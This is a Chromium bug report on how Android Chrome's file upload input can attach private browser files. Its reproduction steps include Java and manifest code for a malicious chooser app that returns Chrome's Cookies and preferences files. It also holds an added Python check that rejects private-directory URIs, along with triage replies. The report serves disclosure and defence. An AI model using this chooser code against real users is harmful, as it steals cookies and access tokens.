Security: Android Chrome allows choosing private files via <input type="file" id="fileinput" />
Reported by dmitry.l...@gmail.com, Apr 17 2016
Issue description
VULNERABILITY DETAILS
Android Chrome allows choosing private files via <input type="file" id="fileinput" />. If the user has a malicious file chooser app, then this app can attach private files from the "/data/data/com.android.chrome/" directory. On malicious web pages this may lead to a leak of the user's private information (cookies, access tokens, etc.).
VERSION
Chrome Version: 49.0.2623.105 stable
Operating System: Android 6.0.1 with April 04.2016 security update
REPRODUCTION CASE
1) Declare ChooserActivity in AndroidManifest.xml:
<activity
    android:name=".ChooserActivity"
    android:label="ChromeMaliciousChooser">
    <intent-filter>
        <action android:name="android.intent.action.CHOOSER"/>
        <category android:name="android.intent.category.DEFAULT"/>
    </intent-filter>
</activity>
2) Add the file-choosing code; the user won't know which file was actually attached. This sample attaches the default preferences file or Cookies (as in the provided PoC):
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.view.View;

public class ChooserActivity extends Activity implements View.OnClickListener {
    // Target package from the report: files live under /data/data/com.android.chrome/
    private static final String PACKAGE_NAME = "com.android.chrome";

    @Override
    public void onClick(View view) {
        if (view.getId() == R.id.choosePreferencesButton) {
            pickFile("shared_prefs/com.android.chrome_preferences.xml", "*/*");
        } else if (view.getId() == R.id.chooseCookiesButton) {
            pickFile("app_chrome/Default/Cookies", "*/*");
        }
    }

    // Return a file:// URI inside the target app's private directory as the
    // chooser result; the calling app treats it as the file the user picked.
    public void pickFile(String privateFileName, String type) {
        Uri uri = Uri.parse("file:///data/data/" + PACKAGE_NAME + "/" + privateFileName);
        Intent intent = new Intent();
        intent.setDataAndType(uri, type);
        setResult(RESULT_OK, intent);
        finish();
    }
}
3) Create a malicious web page that asks the user to upload files with
<input type="file" id="fileinput" />
4) Load the malicious web page (for example, our malicious app can open this page automatically)
5) Press the "Choose file" button and choose a file through our malicious file picker
6) Make sure that the selected file has private content.
PoC:
I attach a PoC with the Android malicious chooser and basic web page code.
Video (accessed only by url): https://youtu.be/SMWUz4PJ8AY
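An added example, not part of the report or of Chromium's own code: an offline Python illustration of the check the reporter says is missing, applied to the URI a chooser hands back before the embedding app uploads it. The package name and the /data/data and /data/user/0 roots are assumptions taken from the report; it covers the file:// case the PoC uses, not content:// results.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed for this example: the package whose private directory the
# report's chooser returns files from (see "/data/data/com.android.chrome/").
CHROME_PACKAGE = "com.android.chrome"


def private_roots(package: str) -> tuple:
    """Directories holding the package's private data; /data/user/0 is the
    per-user alias of /data/data on current Android builds (assumption)."""
    return (f"/data/data/{package}", f"/data/user/0/{package}")


def normalised_file_path(uri: str):
    """Normalised filesystem path of a file:// URI, or None for any other
    scheme (content:// results are served by a provider, not a raw path)."""
    parts = urlsplit(uri)
    if parts.scheme != "file":
        return None
    # Percent-decode first so "%2e%2e" cannot hide a ".." segment, then
    # collapse "..", "." and repeated slashes.
    path = posixpath.normpath(unquote(parts.path))
    if not path.startswith("/"):
        return None
    # posixpath.normpath keeps a POSIX "//" prefix; collapse it for comparison.
    return "/" + path.lstrip("/")


def points_into_private_data(uri: str, package: str = CHROME_PACKAGE) -> bool:
    """True if the chooser result resolves inside the package's private
    directory. On a device the path should also be passed through
    os.path.realpath to resolve symlinks; this offline check is string-only."""
    path = normalised_file_path(uri)
    if path is None:
        return False
    for root in private_roots(package):
        # Compare on a directory boundary so "com.android.chrome.evil" does not match.
        if path == root or path.startswith(root + "/"):
            return True
    return False


def accept_chooser_result(uri: str, package: str = CHROME_PACKAGE) -> bool:
    """Policy the embedding app applies to the returned URI: refuse anything
    inside its own private data directory, whatever the chooser claims."""
    return not points_into_private_data(uri, package)
```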
Apr 18 2016
Hi, could you please look at the video that I provided? (https://youtu.be/SMWUz4PJ8AY) I'm not sure that you understood me correctly; why did you mark this as a physical attack? If the user has a malicious chooser app, then he can't be sure that he uploads the selected file! It may be some malicious photo gallery app, and he will think that he uploads the selected photo file, but actually the file with Cookies will be uploaded. There is no check on attaching private files.
Apr 19 2016
The pre-condition that user has malicious chooser app is the entirety of the bug.
Apr 19 2016
Getting that app onto the phone requires the equivalent of physical access.
Apr 20 2016
In Android the user must have a file chooser app; if the system doesn't contain such an app, then the user won't be able to select any files and upload them. There are plenty of alternative file chooser apps in Google Play; could you guarantee that nobody uses this attack? Nope, because there is no prevention against attaching such files.
> Getting that app onto the phone requires the equivalent of physical access.
In the same way we can say that opening some URL in the browser is also the equivalent of physical access (because the URL won't be opened automatically, just as a malicious file chooser app won't be installed from Google Play).
Jul 26 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Oct 2 2016
Comment 1 by tsepez@chromium.org, Apr 18 2016